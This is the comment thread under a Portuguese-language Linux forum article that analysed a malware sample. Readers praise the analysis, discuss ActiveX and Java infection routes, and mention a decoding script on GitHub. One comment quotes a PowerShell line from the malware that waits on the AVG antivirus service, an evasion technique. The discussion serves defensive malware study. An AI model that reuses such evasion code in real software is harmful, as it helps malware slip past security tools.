Não tenho tanto conhecimento para de fato destrinchar por completo de uma maneira mais prática.
Se não se importar, gostaria que pegasse ele, estudasse e destrinchasse. Se é que já não o fez algum dia.
Já encontrei ele. Tem várias funções e um enorme "String.fromCharCode( )".
Se concordar, vou enviar pelo Linux, pois pelo Windows tem que desativar todo o Antivirus, pois já é um conhecido na praça.


Pode me enviar, assim que possível dou uma olhada. um abraço

[25] Comentário enviado por leo4b em 04/12/2016 - 21:32h

Por que ele direciona para o AVG? E se for outro AV?
"while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}"

[26] Comentário enviado por andremilke em 05/12/2016 - 08:03h


[25] Comentário enviado por leo4b em 04/12/2016 - 21:32h

Por que ele direciona para o AVG? E se for outro AV?
"while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}"



Olá leo4b, ele procura por *AVG*, acredito que seja direcionado apenas para o AVG.

[27] Comentário enviado por dan108 em 05/12/2016 - 23:38h

Foi pros favoritos aki. Muito bom cara. Quero ser igual a vc quando crescer!!!

[28] Comentário enviado por andremilke em 06/12/2016 - 08:11h


[27] Comentário enviado por dan108 em 05/12/2016 - 23:38h

Foi pros favoritos aki. Muito bom cara. Quero ser igual a vc quando crescer!!!


Obrigado, que bom que gostou. O aprendizado é continuo, estamos sempre na luta.

[29] Comentário enviado por Freud_Tux em 06/12/2016 - 12:18h

Caraca!
Eu fico sem aparecer por um tempo, e rola tudo isso :p
Mas brincadeiras a parte...

André (andremilke) parabéns pelo trabalho de análise, ficou show!
E estou favoritando esse seu trabalho, muito bem feito.

T+
______________________________________________________________________

Noob: "[...]Sou muito noob ainda usando o terminal, então preciso de ajuda "mastigada", pra operá-lo."

zhushazang: "Sou velho e meus dentes desgastados. Estude linux www.guiafoca.org";

[30] Comentário enviado por andremilke em 06/12/2016 - 13:17h


[29] Comentário enviado por Freud Tux em 06/12/2016 - 12:18h

Caraca!
Eu fico sem aparecer por um tempo, e rola tudo isso :p
Mas brincadeiras a parte...

André (andremilke) parabéns pelo trabalho de análise, ficou show!
E estou favoritando esse seu trabalho, muito bem feito.

T+
______________________________________________________________________

Noob: "[...]Sou muito noob ainda usando o terminal, então preciso de ajuda "mastigada", pra operá-lo."

zhushazang: "Sou velho e meus dentes desgastados. Estude linux www.guiafoca.org";


Obrigado Freud, que bom que gostou. Fico feliz de ter colaborado um pouco.

[31] Comentário enviado por Lisandro em 10/12/2016 - 20:34h

Super legal! Parabéns pelo excelente artigo.

[32] Comentário enviado por andremilke em 12/12/2016 - 08:10h


[31] Comentário enviado por Lisandro em 10/12/2016 - 20:34h

Super legal! Parabéns pelo excelente artigo.


Obrigado Lisandro, que bom que pude contribuir.

[33] Comentário enviado por tiago4171 em 13/12/2016 - 15:21h

Caraka mano. Excelente artigo!!!
Favoritado
Não entendo muito dessas coisas, mas será que dá pra identificar o miserável? Tu tem alguns IP's, dá pra denunciar.
Conheço uma galera bacana no Facebook. Caso identifique, me comunique que eu repasso.

EXCELENTE TRABALHO!!! CONTINUE SENDO ESPETACULAR, É DE PESSOAS ASSIM QUE SE VIVE O OPENSOURCE

[34] Comentário enviado por andremilke em 13/12/2016 - 16:14h


[33] Comentário enviado por tiago4171 em 13/12/2016 - 15:21h

Caraka mano. Excelente artigo!!!
Favoritado
Não entendo muito dessas coisas, mas será que dá pra identificar o miserável? Tu tem alguns IP's, dá pra denunciar.
Conheço uma galera bacana no Facebook. Caso identifique, me comunique que eu repasso.

EXCELENTE TRABALHO!!! CONTINUE SENDO ESPETACULAR, É DE PESSOAS ASSIM QUE SE VIVE O OPENSOURCE


Obrigado tiago4171, o pessoal do site já está tomando as devidas providências.

[35] Comentário enviado por andrerochatriade em 15/12/2016 - 08:05h

Bom dia,

A principio parabens pelo artigo, que demonstra claramente muito esforço e dedicaçao de sua parte.
"Impressionante"! Esta eh a palavra que resume a horas de analise e experiencia anterior para sua conclusao final.
Obrigado por dispor de seu tempo e compartilhar seus conhecimentos.


"A mente que se abre a uma nova ideia,
jamais retorna ao tamanho original."
(Albert Einstein)

[36] Comentário enviado por ricardogroetaers em 22/12/2016 - 05:13h

Parabéns pelo trabalho, infelizmente não posso contribuir pois não manjo nada disso.
Só a título de informação, o Symantec Edpoint Protecion (acho que é assim que se escreve) detectou um "win trojan" no arquivo baixado. Eu já joguei o arquivo fora.

[37] Comentário enviado por andremilke em 04/01/2017 - 08:00h


[35] Comentário enviado por andrerochatriade em 15/12/2016 - 08:05h

Bom dia,

A principio parabens pelo artigo, que demonstra claramente muito esforço e dedicaçao de sua parte.
"Impressionante"! Esta eh a palavra que resume a horas de analise e experiencia anterior para sua conclusao final.
Obrigado por dispor de seu tempo e compartilhar seus conhecimentos.


"A mente que se abre a uma nova ideia,
jamais retorna ao tamanho original."
(Albert Einstein)



Obrigado andrerochatriade, muito bom poder contribuir um pouco com o forum. É uma incrível ferramenta de aprendizado, tenho aprendido muito por aqui.

[38] Comentário enviado por andremilke em 04/01/2017 - 08:01h


[36] Comentário enviado por ricardogroetaers em 22/12/2016 - 05:13h

Parabéns pelo trabalho, infelizmente não posso contribuir pois não manjo nada disso.
Só a título de informação, o Symantec Edpoint Protecion (acho que é assim que se escreve) detectou um "win trojan" no arquivo baixado. Eu já joguei o arquivo fora.

Olá ricardogroetaers, obrigado.

[39] Comentário enviado por MarcosCarraro em 06/01/2017 - 08:46h

Bom Dia André, bela explicação!

Neste caso o atacante se beneficiou do usuário estar permitindo a execução do ActiveX, pois até onde sei é preciso habilitar esta função no IE, e nos demais navegador instalar um plugin, confere?

Já vi muito atacantes fazerem a utilização do Java, para infectar equipamentos, principalmente porque usuários acabam aceitando a execução do applet sem desconfiar, acostumados com o dia a dia de alguns bancos.

Abraços

[40] Comentário enviado por andremilke em 06/01/2017 - 09:16h


[39] Comentário enviado por MarcosCarraro em 06/01/2017 - 08:46h

Bom Dia André, bela explicação!

Neste caso o atacante se beneficiou do usuário estar permitindo a execução do ActiveX, pois até onde sei é preciso habilitar esta função no IE, e nos demais navegador instalar um plugin, confere?

Já vi muito atacantes fazerem a utilização do Java, para infectar equipamentos, principalmente porque usuários acabam aceitando a execução do applet sem desconfiar, acostumados com o dia a dia de alguns bancos.

Abraços


Isso aí MarcosCarraro, obrigado.

[41] Comentário enviado por andremilke em 29/03/2017 - 09:41h

Olá pessoal,
Criei um script em python, para decriptar Base64 em string compactada. Conforme o passo feito em c#, fiz o mesmo em python.
Abaixo link do github:
https://github.com/andremilke/deflate64

Um abraço,
André Milke


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor HostGator.
Linux banner
Linux banner
Linux banner

Destaques

Artigos

Dicas

Viva o Android

Tópicos

Top 10 do mês

Scripts